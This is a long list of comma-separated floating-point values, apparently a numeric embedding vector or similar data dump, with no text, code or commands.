-0.016034049913287163, -0.07486607879400253, -0.014862097799777985, -0.01937628723680973, 0.004399163648486137, -0.01151118054986, -0.021789640188217163, 0.022032713517546654, -0.024862762540578842, 0.0007601415854878724, -0.002639064099639654, 0.013073784299194813, 0.012118860147893429, -0.011059761978685856, 0.031495146453380585, -0.00032282958272844553, -0.0037545894738286734, 0.042329199612140656, -0.004488145001232624, -0.002148580038920045, 0.024671776220202446, 0.032762590795755386, -0.01667645387351513, -0.033891137689352036, -0.005881466902792454, -0.007569946814328432, 0.004312352277338505, 0.026859421283006668, 0.035731539130210876, -0.023282796144485474, 0.007613352499902248, 0.02324807085096836, 0.008047409355640411, -0.030019354075193405, -0.009037057869136333, -0.05698294937610626, 0.0035874778404831886, -0.00916727539151907, 0.001056385226547718, -0.022171610966324806, 0.02597394585609436, -0.010721198283135891, -0.01196260005235672, 0.01657228171825409, 0.01741435006260872, 0.013820362277328968, 0.0009055505506694317, -0.02154656872153282, -0.006636725272983313, -0.022032713517546654, 0.014254418201744556, 0.007183636538684368, -0.02015758864581585, -0.00791719276458025, 0.03484606370329857, 0.03930816426873207, -0.0060203648172318935, 0.012153584510087967, 0.010356590151786804, -0.006810348015278578, 0.03019297681748867, -0.03300566226243973, -0.0332660973072052, 0.023977287113666534, -0.00882002990692854, -0.023890474811196327, -0.01064306776970625, -0.018421361222863197, 0.002276626881211996, -0.030036715790629387, -0.025001659989356995, -0.03363070636987686, -0.005998662207275629, -0.005048078019171953, -0.005343236494809389, 0.007075122557580471, 0.0001393050333717838, -0.02724139206111431, -0.005087143275886774, 0.015209343284368515, 0.03156459704041481, 0.005521200131624937, 0.020591644570231438, -0.009818360209465027, 0.020192312076687813, -0.018160928040742874, 0.012683133594691753, -0.0016179459635168314, -0.031616684049367905, 0.01538296602666378, 0.006875456310808659, -0.0022115183528512716, 0.008177625946700573, 0.028057418763637543, 0.003624372649937868, -0.024307169020175934, -0.032866764813661575, 0.039134543389081955, -0.045384958386421204, 0.005516859237104654, -0.04337093606591225, 0.01612086221575737, 0.0276754479855299, 0.028890807181596756, 0.022970275953412056, 0.0023873113095760345, 0.01619899272918701, 0.013386305421590805, 0.020904164761304855, 0.02527945674955845, -0.008142901584506035, 0.012162265367805958, -0.024446068331599236, 0.02132086083292961, 0.010851414874196053, 0.005603670608252287, -0.010755922645330429, -0.0061419010162353516, 0.02527945674955845, 0.010669111274182796, 0.007912851870059967, 0.0023894815240055323, 0.004110516048967838, 0.013568609021604061, -0.0409749411046505, -0.007990982383489609, 0.0193589236587286, 0.0016960761277005076, 0.028213677927851677, -0.012552917003631592, -0.01481001079082489, 0.0120754549279809, 0.0017991645727306604, -0.008876457810401917, -0.007943235337734222, -0.015782298520207405, 0.0040128533728420734, -0.031165262684226036, -0.017527205869555473, -0.005534221418201923, 0.02585241012275219, -0.018317189067602158, 0.0011914853239431977, 0.0120754549279809, -0.018664434552192688, -0.027310840785503387, 0.011910513043403625, 0.0024828037712723017, -0.014480127952992916, -0.01802203059196472, 0.020938890054821968, 0.009991982951760292, 0.005221700761467218, 0.005035056732594967, 0.010799327865242958, 0.012518192641437054, -0.013073784299194813, 0.022484131157398224, 0.008711515925824642, -0.024689139798283577, -0.025591976940631866, 0.010044069960713387, 0.009219362400472164, 0.0061679440550506115, -0.02003605291247368, 0.008537893183529377, 0.02777962200343609, 0.00020685509662143886, 0.04462101683020592, 0.002945074113085866, 0.028074780479073524, 0.0006396909011527896, 0.017214683815836906, -0.0012489978689700365, -0.021789640188217163, 0.013507841154932976, 0.01737094484269619, -0.056913502514362335, 0.02722403034567833, 0.0056904819793999195, 0.03180766850709915, 0.017709508538246155, 0.004405674524605274, -0.02404673583805561, -0.012205671519041061, -0.01161535456776619, -0.036287132650613785, 0.015634719282388687, 0.014202332124114037, -0.03418629616498947, -0.025088470429182053, 0.0012272950261831284, 0.046287793666124344, -0.0014399827923625708, -0.0016863099299371243, -0.024793311953544617, 0.008416357450187206, 0.010217692703008652, -0.04159998521208763, 0.029550572857260704, -0.0198277048766613, 0.012769944965839386, -0.011650078929960728, 0.006350248120725155, 0.02026176266372204, 0.01379431877285242, -0.032189637422561646, -0.002610850380733609, 0.0038761254400014877, 0.018508173525333405, 0.0012251246953383088, -0.019324200227856636, 0.03375224024057388, 0.023751577362418175, -0.007865105755627155, -0.020938890054821968, -0.010313184931874275, -0.020140226930379868, 0.0003854965034406632, 0.009045739658176899, -0.02095625177025795, -0.019411010667681694, -0.02758863754570484, -0.02642536535859108, 0.035731539130210876, 0.03590516000986099, 0.022293146699666977, -0.025435715913772583, 0.009332217276096344, 0.01428914349526167, -0.01892486773431301, -0.02746710181236267, 0.0010368527146056294, 0.022136885672807693, -0.0024176952429115772, -0.007934554480016232, 0.006667109206318855, -0.01747511886060238, 0.012960930354893208, 0.00726176705211401, -0.005742568988353014, 0.004744238685816526, 0.0010569278383627534, 0.02109515108168125, 0.002283137757331133, -0.02937695011496544, 0.0272066667675972, -0.006588979158550501, 0.032641056925058365, 0.006732217967510223, 0.008780964650213718, -0.029915180057287216, 0.019411010667681694, -0.013516522012650967, 0.0011654419358819723, 0.002311351476237178, -0.01764005981385708, -0.0036807998549193144, -0.019983965903520584, -0.010278460569679737, 0.029811007902026176, 0.00885909516364336, -0.006033386569470167, 0.01298697292804718, 0.030679119750857353, -0.0013868107926100492, -0.02267511747777462, 0.0036222022026777267, -0.04785040020942688, 0.008364270441234112, 0.0016070945421233773, -0.008442400954663754, 0.007639396004378796, -0.0007134805200621486, -0.011719527654349804, -0.002862603170797229, 0.011163935996592045, -0.020990977063775063, -0.012283802032470703, -0.05750381946563721, -0.009583969600498676, -0.004438228905200958, -0.006632384844124317, 0.010712516494095325, -0.0018176119774580002, 0.0010932800360023975, 0.007027376443147659, -0.03337027132511139, 0.01958463340997696, 0.009991982951760292, -0.05649680644273758, -0.011077124625444412, 0.003416025312617421, -0.020331211388111115, 0.002667277818545699, 0.030505497008562088, 0.02109515108168125, -0.0007867275853641331, 0.01880333200097084, -0.03670382499694824, 0.010929545387625694, -0.0028191974852234125, 0.005534221418201923, 0.011719527654349804, -0.02052219584584236, 0.029307501390576363, 0.010790647007524967, 0.014540895819664001, 0.007626374252140522, -0.05660098046064377, -0.013733550906181335, -0.007648077327758074, 0.03335290774703026, -0.0011762933572754264, -0.017831044271588326, -0.016771946102380753, -0.0015875620301812887, 0.012431381270289421, -0.0023525867145508528, 0.029550572857260704, 0.019098490476608276, -0.016728540882468224, 0.010695154778659344, 0.005412685684859753, 0.030106166377663612, -0.007240063976496458, 0.02482803724706173, -0.014054752886295319, -0.03781501203775406, -0.010243735276162624, 0.019115852192044258, -0.015565269626677036, -0.004861433990299702, 0.014393316581845284, 0.020817354321479797, 0.021216686815023422, -0.04170415922999382, 0.008741899393498898, -0.04316258803009987, 0.006480465177446604, -0.006727877072989941, -0.0095145208761096, 0.02288346365094185, -0.0017123533179983497, -0.005725206341594458, 0.017579292878508568, -0.010903501883149147, -0.017735552042722702, 0.03802335634827614, -0.010564937256276608, -0.017275452613830566, -0.035505831241607666, -0.011302833445370197, -0.004796325229108334, -0.018647070974111557, -0.01835191249847412, 0.010278460569679737, -0.0046704490669071674, -0.035592641681432724, -0.0161642674356699, 0.002190900733694434, -0.02915124036371708, 0.0006434888928197324, 0.019185300916433334, -0.024654414504766464, 0.013282131403684616, -0.024220358580350876, -0.00005629171573673375, 0.032623693346977234, 0.019515184685587883, -0.0190290417522192, -0.004939564038068056, 0.002697661751881242, 0.0007178211235441267, 0.012735220603644848, -0.0015354752540588379, -0.018594983965158463, 0.014566939324140549, -0.015513182617723942, -0.05229513719677925, 0.008425038307905197, 0.00388697674497962, -0.019515184685587883, 0.009583969600498676, 0.019862430170178413, 0.009879128076136112, -0.0037589301355183125, -0.00532587431371212, 0.003988980315625668, 0.043023690581321716, -0.0038110169116407633, 0.04364873096346855, 0.007852084003388882, -0.008177625946700573, -0.019549909979104996, 0.050072770565748215, -0.003580966964364052, 0.00026816560421139, -0.017917856574058533, 0.0037415679544210434, 0.002667277818545699, -0.024654414504766464, -0.0159993264824152, -0.01562603749334812, 0.0013097657356411219, -0.00855091493576765, 0.028682459145784378, 0.016988975927233696, 0.016780627891421318, 0.014966271817684174, -0.0011979962000623345, -0.00677562365308404, -0.007938895374536514, -0.03076593205332756, 0.018838055431842804, -0.013151914812624454, 0.021685468032956123, -0.0008518360555171967, -0.020765267312526703, -0.007300831843167543, 0.008364270441234112, 0.026807336136698723, -0.030019354075193405, -0.057226020842790604, 0.004631383810192347, -0.018403999507427216, -0.01037395279854536, -0.02927277609705925, 0.018369274213910103, 0.007027376443147659, -0.03418629616498947, -0.027866434305906296, 0.012223034165799618, 0.015070444904267788, 0.01869915798306465, 0.03951651230454445, -0.01173689030110836, 0.022258421406149864, -0.008924203924834728, 0.014558258466422558, -0.0016667773015797138, -0.0389956459403038, -0.0029732875991612673, -0.015443733893334866, -0.02402937225997448, -0.010391314513981342, 0.013533884659409523, 0.024098822847008705, -0.042572271078825, -0.015799660235643387, 0.027189305052161217, 0.011545905843377113, -0.018421361222863197, -0.010478125885128975, -0.031668771058321, -0.03074856847524643, -0.005490815732628107, -0.0018989975797012448, 0.006016024388372898, 0.003409514669328928, -0.0034702825360000134, 0.0034984962549060583, 0.021616019308567047, -0.006806007586419582, -0.007995322346687317, 0.0006744154379703104, 0.012136222794651985, -0.021129874512553215, -0.02279665321111679, -0.03736359253525734, -0.025036385282874107, 0.024880124256014824, -0.028213677927851677, -0.009340898133814335, -0.0010547575075179338, 0.04090549424290657, 0.013664101250469685, -0.0012110179523006082, -0.00885909516364336, 0.024237720295786858, 0.0014877290232107043, -0.041183289140462875, -0.030227702111005783, 0.020661093294620514, -0.015912514179944992, -0.007799996994435787, 0.004653086885809898, -0.014792649075388908, 0.009002333506941795, -0.0038848065305501223, -0.002695491537451744, 0.003474622964859009, -0.028630373999476433, 0.015921195968985558, -0.002406843937933445, -0.037085793912410736, -0.014341229572892189, -0.0026195314712822437, 0.025591976940631866, -0.025331543758511543, -0.000021177214875933714, -0.000015938016076688655, 0.01493154652416706, -0.01162403542548418, -0.020661093294620514, 0.0003591818385757506, -0.025019021704792976, -0.01127678994089365, -0.001869698753580451, -0.007274788338690996, -0.014245737344026566, 0.03074856847524643, -0.03215491399168968, -0.011363601312041283, 0.02050483413040638, 0.017466437071561813, 0.008064772002398968, 0.009601332247257233, -0.02413354627788067, -0.024446068331599236, 0.026703162118792534, 0.01741435006260872, -0.03677327558398247, 0.007422367576509714, -0.014132882468402386, 0.007487476337701082, -0.008407676592469215, -0.009601332247257233, 0.007383302785456181, 0.03324873372912407, 0.006871115881949663, 0.02300499938428402, -0.0033378952648490667, -0.034446731209754944, -0.009340898133814335, -0.019671445712447166, -0.016259759664535522, 0.0154350521042943, 0.031668771058321, -0.035505831241607666, 0.022866101935505867, -0.011320196092128754, 0.013716188259422779, 0.020990977063775063, -0.017848407849669456, 0.0015137724112719297, 0.020435385406017303, -0.001603839104063809, 0.005716525483876467, -0.025348905473947525, 0.00031387718627229333, 0.0022288805339485407, -0.011094486340880394, -0.013377624563872814, -0.022744566202163696, -0.018733883276581764, -0.018629709258675575, 0.0033834711648523808, 0.012787307612597942, -0.00013944068632554263, 0.010000663809478283, 0.012101497501134872, 0.009601332247257233, 0.00413872953504324, -0.01481001079082489, -0.010443401522934437, -0.0444473959505558, -0.014011346735060215, 0.010521532036364079, 0.003455090569332242, 0.026980958878993988, -0.008216691203415394, 0.0029559254180639982, -0.008030046708881855, 0.03246743232011795, 0.025817686691880226, -0.026789972558617592, 0.003518028650432825, 0.0012186139356344938, 0.020365934818983078, 0.014245737344026566, 0.018664434552192688, -0.0019858088344335556, 0.010564937256276608, 0.007990982383489609, 0.015660762786865234, 0.002091067610308528, 0.023959923535585403, 0.01236193161457777, 0.021129874512553215, 0.009722867980599403, -0.00928013026714325, 0.028960255905985832, -0.028769271448254585, -0.0323285348713398, 0.024237720295786858, 0.029238052666187286, -0.0025305498857051134, -0.033665429800748825, -0.010044069960713387, -0.007361599709838629, 0.012405337765812874, 0.013533884659409523, 0.004405674524605274, 0.006667109206318855, -0.00677562365308404, -0.0011752082500606775, -0.009983302094042301, 0.030488135293126106, 0.0005642735632136464, -0.017726872116327286, -0.003376960288733244, -0.014106838963925838, -0.006732217967510223, 0.010564937256276608, -0.015886470675468445, -0.00811251811683178, -0.02071318030357361, -0.005629714112728834, -0.03189447894692421, -0.01259632222354412, -0.02050483413040638, 0.00791719276458025, -0.001398747437633574, 0.012544235214591026, 0.017015019431710243, 0.0035549234598875046, 0.001852336572483182, -0.017275452613830566, -0.02279665321111679, 0.018074115738272667, -0.029567934572696686, 0.009080464020371437, -0.014636388048529625, -0.008915522135794163, -0.00928013026714325, -0.022258421406149864, -0.017275452613830566, -0.003138229250907898, 0.0358009897172451, -0.04159998521208763, -0.015608674846589565, 0.014193650335073471, -0.013933217152953148, 0.0193589236587286, -0.004535891581326723, -0.005443069618195295, -0.014306505210697651, -0.023630041629076004, -0.004462101962417364, -0.037433039397001266, -0.006059430073946714, 0.01048680767416954, 0.10215955972671509, -0.008459762670099735, 0.020765267312526703, -0.03179030492901802, -0.015322198159992695, 0.00003669134821393527, -0.004570615943521261, 0.019636720418930054, -0.0021670274436473846, 0.010712516494095325, 0.011302833445370197, -0.004579297266900539, -0.005707844160497189, 0.004405674524605274, 0.0051392302848398685, 0.013993985019624233, -0.005694822408258915, -0.015521863475441933, 0.018994316458702087, 0.004978629294782877, 0.02550516650080681, -0.015947239473462105, 0.007105506490916014, -0.01913321390748024, 0.012457423843443394, -0.025887135416269302, -0.03064439631998539, -0.009731548838317394, -0.028178954496979713, -0.01001802645623684, 0.0007894404116086662, -0.011650078929960728, -0.027293479070067406, -0.007739229127764702, 0.014749242924153805, 0.01927211321890354, 0.01892486773431301, -0.025713512673974037, -0.01708446815609932, -0.011294152587652206, -0.005655757617205381, -0.019428372383117676, -0.02576559968292713, 0.015391646884381771, -0.004739898256957531, -0.020331211388111115, 0.024584965780377388, 0.016867440193891525, -0.014844735153019428, -0.00671919621527195, -0.015287472866475582, -0.02826576493680477, 0.019879791885614395, 0.02755391225218773, 0.0008274203864857554, 0.023265434429049492, -0.0003448037023190409, -0.007960597984492779, -0.00450550764799118, -0.007331215776503086, 0.010408677160739899, -0.0004950957954861224, 0.017969943583011627, 0.01915057748556137, 0.0010395655408501625, -0.007274788338690996, -0.033092476427555084, 0.004770282190293074, -0.02677261084318161, -0.0005189689109101892, 0.012006005272269249, -0.0021843898575752974, 0.01737094484269619, 0.019393648952245712, 0.011346239596605301, 0.014263099990785122, 0.011120529845356941, 0.017579292878508568, -0.031842391937971115, -0.013820362277328968, 0.024637052789330482, 0.03168613091111183, -0.0029949904419481754, 0.006701834034174681, -0.018074115738272667, 0.015964601188898087, -0.0038565928116440773, 0.00974891148507595, -0.0012989143142476678, -0.010564937256276608, -0.0022245401050895452, -0.004765941295772791, 0.014115520752966404, 0.012631046585738659, -0.005538562312722206, 0.026477452367544174, 0.0036569267977029085, 0.001700416672974825, -0.010035388171672821, -0.00873755943030119, -0.003665607888251543, -0.009610013104975224, 0.031859755516052246, -0.01133755873888731, -0.005621032789349556, 0.015808342024683952, 0.00728781009092927, 0.021216686815023422, 0.008212351240217686, -0.013750912621617317, -0.018299825489521027, -0.03029715083539486, -0.000923455401789397, -0.018369274213910103, 0.011780296452343464, 0.02244940772652626, 0.004303670953959227, 0.01247478649020195, -0.031616684049367905, -0.013151914812624454, -0.01133755873888731, -0.009210680611431599, 0.04541968181729317, -0.011571948416531086, 0.002017277991399169, 0.0005252084811218083, -0.011467775329947472, -0.027432376518845558, 0.02060900628566742, 0.03722469508647919, 0.007144571747630835, 0.0021952411625534296, 0.0001281823351746425, -0.0028691140469163656, 0.024862762540578842, -0.02380366437137127, 0.02607811987400055, 0.025539889931678772, -0.008025706745684147, -0.01161535456776619, -0.012830712832510471, 0.02904706820845604, 0.01915057748556137, -0.007049079053103924, 0.008668109774589539, 0.005490815732628107, 0.0055081783793866634, -0.002491484861820936, 0.010330546647310257, 0.01053021289408207, 0.00043052987894043326, -0.028092142194509506, 0.014202332124114037, 0.033665429800748825, 0.00470083300024271, 0.0064370594918727875, 0.022241059690713882, -0.017379626631736755, 0.00532587431371212, 0.0004031300777569413, 0.013360261917114258, 0.005460431799292564, 0.028422025963664055, -0.0021822196431457996, -0.006489146035164595, 0.018820693716406822, -0.02119932323694229, -0.04503771290183067, 0.001711268094368279, -0.02802269347012043, -0.007296491414308548, 0.004913520533591509, -0.017396988347172737, -0.004683470819145441, 0.030939554795622826, 0.000787812692578882, -0.0009820529958233237, -0.01417628861963749, 0.028387300670146942, -0.020574282854795456, 0.0060767922550439835, 0.011302833445370197, -0.005256425589323044, 0.0075135198421776295, 0.032293811440467834, -0.02654690109193325, -0.009158594533801079, 0.01691952534019947, -0.0476420521736145, 0.0185602605342865, 0.012891480699181557, 0.04024572670459747, -0.024307169020175934, -0.006871115881949663, -0.018942229449748993, -0.005664438474923372, -0.011693485081195831, -0.013412348926067352, -0.017587972804903984, -0.013386305421590805, -0.011094486340880394, -0.012926205061376095, -0.017579292878508568, -0.0068580941297113895, 0.0010786306811496615, -0.023977287113666534, 0.0015116020804271102, 0.003891317406669259, -0.002617361256852746, 0.011545905843377113, -0.02937695011496544, 0.02277928963303566, 0.027953244745731354, -0.009340898133814335, 0.024793311953544617, -0.0023612678050994873, 0.0066193630918860435, -0.022136885672807693, -0.012726539745926857, -0.010669111274182796, -0.00796927884221077, 0.014315186999738216, 0.008216691203415394, -0.00045521685387939215, -0.02564406394958496, 0.017605336382985115, 0.04910048097372055, -0.02564406394958496, -0.0018425702583044767, 0.0036569267977029085, -0.03482870012521744, 0.00714891217648983, 0.003359598107635975, 0.01843872480094433, -0.0008833051542751491, -0.03205073997378349, 0.021147238090634346, -0.007018695119768381, -0.005052418913692236, -0.0030904829036444426, 0.015634719282388687, -0.0022679457906633615, -0.03500232473015785, 0.003869614563882351, 0.0002981426368933171, -0.0001540900848340243, 0.009358259849250317, 0.011485137976706028, -0.013394986279308796, 0.020435385406017303, -0.04010682925581932, -0.009601332247257233, -0.0024437387473881245, -0.007786975242197514, 0.0008746240637265146, 0.024098822847008705, 0.0023873113095760345, -0.01282203197479248, 0.006966608576476574, 0.007274788338690996, 0.002419865457341075, -0.018959593027830124, -0.004334054887294769, 0.021442396566271782, -0.022866101935505867, 0.03135624900460243, -0.009245405904948711, -0.005390983074903488, 0.007791315671056509, -0.0011480796383693814, 0.02323070913553238, 0.023039724677801132, 0.005469113122671843, -0.0011084720026701689, 0.0035657749976962805, -0.006610681768506765, 0.0185602605342865, -0.015539226122200489, 0.001456259866245091, -0.009254086762666702, -0.029828369617462158, 0.07347709685564041, 0.005516859237104654, -0.02026176266372204, 0.017353583127260208, -0.027935883030295372, -0.028074780479073524, -0.007387643214315176, -0.020088139921426773, -0.014723199419677258, -0.01566944271326065, 0.008589980192482471, -0.0031230372842401266, -0.03996793180704117, 0.02927277609705925, -0.012483467347919941, -0.018594983965158463, 0.029585298150777817, -0.01504440139979124, -0.0041777947917580605, 0.019289474934339523, 0.01913321390748024, 0.0009250831208191812, 0.021563932299613953, -0.014792649075388908, 0.006697493139654398, -0.020574282854795456, -0.02140767127275467, 0.015018357895314693, -0.006146241445094347, 0.003934722859412432, -0.03562736511230469, -0.005833720788359642, -0.035835713148117065, -0.009957258589565754, 0.007274788338690996, 0.0225535798817873, -0.0013021697523072362, -0.019619358703494072, 0.014566939324140549, 0.009097826667129993, -0.03029715083539486, -0.03562736511230469, -0.02986309304833412, -0.01810884103178978, 0.008064772002398968, 0.005725206341594458, 0.013004335574805737, 0.0018479959107935429, -0.02244940772652626, 0.03345708176493645, 0.0013444903306663036, 0.010313184931874275, 0.003381300950422883, 0.010452082380652428, -0.02196326293051243, 0.0014085136353969574, 0.00606377050280571, -0.01026109792292118, -0.005291149951517582, -0.035384293645620346, 0.032293811440467834, -0.018612347543239594, -0.0034203659743070602, 0.03179030492901802, 0.0018045903416350484, 0.003596158931031823, 0.000009868005690805148, -0.00259348819963634, -0.026390641927719116, -0.022084800526499748, -0.015981964766979218, 0.001056385226547718, 0.026477452367544174, 0.02652953937649727, 0.004844071809202433, -0.005456091370433569, 0.025921860709786415, 0.004653086885809898, -0.030019354075193405, -0.03830115497112274, 0.030019354075193405, -0.0006472868844866753, 0.010634386911988258, -0.0029559254180639982, -0.008785305544734001, -0.010573619045317173, 0.01138964481651783, 0.011476456187665462, -0.006532551720738411, -0.01835191249847412, -0.0040150233544409275, -0.013290813192725182, 0.007144571747630835, -0.006645406596362591, 0.002237561857327819, 0.027744896709918976, 0.008958928287029266, -0.023439055308699608, 0.025487802922725677, -0.00012343484559096396, -0.014714518561959267, 0.009714186191558838, 0.018178289756178856, -0.02005341462790966, 0.022727202624082565, -0.005160932894796133, 0.01041735801845789, -0.008967609144747257, -0.0169368889182806, 0.0006879796856082976, 0.023265434429049492, 0.030939554795622826, 0.04503771290183067, 0.0009842233266681433, 0.007010013796389103, -0.0028474112041294575, -0.0014074285281822085, -0.03441200777888298, 0.009141231887042522, 0.025036385282874107, -0.0076784612610936165, -0.004403504077345133, 0.018473448231816292, 0.00771752605214715, 0.007187977433204651, -0.007001332938671112, 0.004355757962912321, 0.04920465499162674, -0.018872780725359917, 0.02071318030357361, -0.015348241664469242, 0.02404673583805561, -0.01464506983757019, -0.006502167787402868, 0.010096156038343906, -0.017171278595924377, 0.0075873094610869884, -0.015096488408744335, 0.0034398986026644707, 0.004739898256957531, -0.000798664113972336, -0.00524340383708477, -0.04809347167611122, 0.0037242055404931307, 0.002730215899646282, 0.011163935996592045, -0.020556921139359474, -0.014054752886295319, 0.009662100113928318, 0.00524340383708477, 0.006055089645087719, 0.024637052789330482, -0.008416357450187206, -0.003693821607157588, -0.000046220244257710874, -0.006584638729691505, -0.003159932093694806, -0.0008361015352420509, -0.016355251893401146, 0.01767478510737419, -0.00023913805489428341, -0.008021365851163864, 0.003676459426060319, -0.004948245361447334, -0.02746710181236267, -0.016129544004797935, -0.006133219692856073, -0.0027106835041195154, -0.008481466211378574, 0.014619026333093643, -0.0010525872930884361, 0.011563267558813095, -0.007786975242197514, 0.002190900733694434, 0.0012023367453366518, 0.0027345565613359213, 0.020886803045868874, 0.008837392553687096, -0.0002602983149699867, 0.007804337423294783, -0.028873445466160774, 0.024550240486860275, 0.0073659406043589115, 0.006814688444137573, 0.02904706820845604, -0.005647076293826103, -0.002741067437455058, 0.004982969723641872, -0.02722403034567833, 0.01821301504969597, -0.004281968344002962, 0.005950916092842817, -0.018195653334259987, -0.0038782956544309855, -0.007101166062057018, -0.004125707782804966, -0.003580966964364052, -0.011606673710048199, -0.005994321778416634, -0.000049713045882526785, 0.013056422583758831, -0.0056731197983026505, 0.0194978229701519, 0.00557762710377574, -0.00006032708552083932, 0.014237056486308575, 0.015747573226690292, 0.017544567584991455, 0.019654082134366035, 0.018768606707453728, 0.010356590151786804, -0.017232047393918037, 0.012292482890188694, 0.0166330486536026, 0.014619026333093643, 0.019688807427883148, 0.02062636986374855, 0.007183636538684368, -0.020539557561278343, 0.0025869773235172033, -0.008863436058163643, 0.0127091770991683, 0.0015278792707249522, 0.014436722733080387, -0.013039059937000275, -0.003698162268847227, 0.013750912621617317, 0.015599993988871574, -0.010625705122947693, -0.0003879380819853395, -0.0026520858518779278, 0.0009858510456979275, 0.01549582090228796, 0.00901101529598236, 0.01821301504969597, -0.01628580316901207, 0.004878796171396971, -0.010825371369719505, -0.0037198651116341352, 0.0011524203000590205, 0.009957258589565754, -0.013073784299194813, -0.01994924061000347, -0.006736558396369219, 0.012040729634463787, 0.008017024956643581, 0.010096156038343906, -0.0008789646090008318, -0.006641065701842308, -0.006723536644130945, 0.003819698002189398, -0.010104837827384472, -0.018768606707453728, 0.0005718695465475321, 0.007786975242197514, 0.0148013299331069, -0.0055081783793866634, -0.0007113102474249899, -0.002684639999642968, 0.00327495695091784, 0.004310181830078363, -0.004883136600255966, 0.01800466701388359, 0.0008035472710616887, -0.007487476337701082, -0.012292482890188694, 0.00432754447683692, -0.006714855320751667, -0.006957927253097296, 0.01344707328826189, 0.0008664854685775936, -0.003194656455889344, -0.010061431676149368, 0.006484805606305599, 0.004965607542544603, -0.015929877758026123, -0.0134383924305439, -0.009757592342793941, 0.011250747367739677, -0.005108846351504326, -0.013872448354959488, 0.01724940910935402, 0.005968278273940086, 0.0033834711648523808, 0.0032141890842467546, 0.009861765429377556, 0.005182635970413685, 0.005994321778416634, -0.007765272632241249, -0.004713854752480984, 0.023855751380324364, 0.0018262931844219565, 0.0031903160270303488, -0.01355992816388607, 0.01150249969214201, -0.008785305544734001, -0.012561597861349583, 0.01417628861963749, -0.012188308872282505, 0.037884458899497986, 0.008420698344707489, -0.021234048530459404, -0.006250414997339249, -0.005317193455994129, -0.013698826543986797, 0.018091479316353798, -0.023959923535585403, -0.019775617867708206, -0.017587972804903984, 0.007313853595405817, 0.02345641888678074, -0.029220690950751305, -0.014940228313207626, -0.005660098046064377, -0.014028709381818771, -0.017631378024816513, 0.005256425589323044, -0.01030450314283371, 0.004666108638048172, -0.004043237306177616, 0.016997655853629112, 0.0018957421416416764, -0.003179464489221573, -0.009453753009438515, 0.00991385243833065, 0.031061090528964996, -0.016702497377991676, -0.020661093294620514, -0.017214683815836906, -0.001028171507641673, -0.001558263204060495, -0.006415356416255236, -0.015018357895314693, -0.01208413578569889, -0.005113186780363321, 0.0033726198598742485, -0.0024328872095793486, -0.004331884905695915, -0.04465574398636818, 0.006193987559527159, -0.0011686973739415407, -0.005234722513705492, 0.02048747055232525, 0.011372283101081848, -0.01258764136582613, 0.006293820682913065, -0.018247738480567932, 0.008004003204405308, 0.010495488531887531, -0.0032923193648457527, 0.00575559027493, 0.02050483413040638, 0.019897153601050377, -0.0039998316206038, 0.014080796390771866, -0.015139893628656864, -0.00011956902744714171, -0.009089144878089428, 0.0002802377857733518, -0.000739523908123374, -0.010504169389605522, 0.017179960384964943, 0.009306173771619797, -0.025904497131705284, 0.002916860394179821, -0.006098495330661535, -0.004666108638048172, -0.004173454362899065, 0.009974620305001736, 0.011007674969732761, 0.018143566325306892, -0.015018357895314693, 0.013481797650456429, 0.004731216933578253, -0.008142901584506035, -0.007101166062057018, 0.005260766018182039, 0.009349578991532326, 0.0049439044669270515, 0.011433050967752934, 0.0042689465917646885, 0.0002946159220300615, 0.018369274213910103, 0.007600331213325262, 0.006957927253097296, -0.006944905500859022, 0.01286543719470501, 0.009427709504961967, -0.004844071809202433, -0.017153916880488396, 0.0034702825360000134, -0.006632384844124317, -0.0007075122557580471, -0.017579292878508568, -0.002871284494176507, -0.0006103920750319958, -0.00470083300024271, -0.022067436948418617, 0.012657090090215206, -0.0017546737799420953, -0.01927211321890354, 0.006246074568480253, -0.0030600989703089, -0.004058429040014744, -0.02779698371887207, -0.0059465751983225346, -0.01577361673116684, 0.00044056744081899524, -0.003131718374788761, 0.021442396566271782, -0.013768275268375874, 0.010356590151786804, -0.00740066496655345, 0.004496826324611902, -0.038335878401994705, -0.017405670136213303, 0.006593319587409496, 0.0014313015853986144, 0.005603670608252287, 0.01810884103178978, -0.00024714096798561513, -0.0016787138301879168, 0.0013043400831520557, -0.015278792008757591, 0.014124201610684395, 0.011207341216504574, 0.009948576800525188, 0.005230382084846497, 0.020070776343345642, 0.021737555041909218, 0.007517860271036625, 0.01531351637095213, -0.000021211124476394616, -0.0023373947478830814, -0.002673788694664836, 0.0004351417301222682, -0.00464440556243062, 0.023959923535585403, -0.01468847505748272, -0.015096488408744335, 0.012301163747906685, 0.00720533961430192, -0.028005331754684448, 0.0027106835041195154, 0.00606377050280571, -0.00962737575173378, -0.00652387086302042, -0.013230045326054096, 0.0027258754707872868, -0.006046408321708441, 0.018855419009923935, 0.015947239473462105, 0.0006803837022744119, -0.000014479856872640084, 0.00901101529598236, -0.0012316355714574456, -0.02472386322915554, -0.007027376443147659, -0.01395925972610712, 0.03875257447361946, 0.011979961767792702, -0.011059761978685856, 0.014870778657495975, 0.0033378952648490667, 0.017223365604877472, 0.0025587636046111584, 0.0081646041944623, -0.03600933402776718, 0.03517594560980797, -0.012926205061376095, 0.0013520863140001893, -0.017214683815836906, -0.00011482153058750555, 0.0167979896068573, -0.009332217276096344, 0.004809346981346607, -0.0005897743976674974, -0.008702835068106651, -0.00769148301333189, 0.008021365851163864, 0.014028709381818771, 0.0060030026361346245, 0.018612347543239594, 0.0076958234421908855, -0.013308174908161163, 0.008125539869070053, -0.019567271694540977, -0.011441731825470924, -0.003910849802196026, -0.0021279624197632074, -0.010061431676149368, 0.02484539896249771, -0.012518192641437054, -0.005035056732594967, -0.0001951898302650079, 0.013230045326054096, -0.03097427822649479, 0.00489615835249424, -0.0006250414880923927, 0.019115852192044258, 0.0009657759219408035, -0.02107778750360012, 0.002817027270793915, 0.03930816426873207, -0.0139071736484766, -0.0036460754927247763, 0.009002333506941795, 0.008043068461120129, -0.03135624900460243, 0.0031425696797668934, 0.023543229326605797, -0.01077328436076641, -0.010625705122947693, 0.002067194553092122, -0.01355992816388607, -0.024671776220202446, -0.0008995822863653302, 0.004787644371390343, -0.004344906657934189, -0.002519698580726981, -0.013143233954906464, 0.011780296452343464, 0.0017253749538213015, 0.014514852315187454, -0.0054387291893363, 0.001456259866245091, 0.011493818834424019, 0.008116858080029488, -0.0023786302190274, 0.007444070652127266, -0.0002541943977121264, -0.025453079491853714, 0.009835722856223583, 0.005395323503762484, -0.006684471387416124, -0.008012684993445873, 0.028456751257181168, 0.018751244992017746, -0.008906841278076172, 0.012006005272269249, -0.012257758527994156, 0.0031186966225504875, -0.01515725627541542, 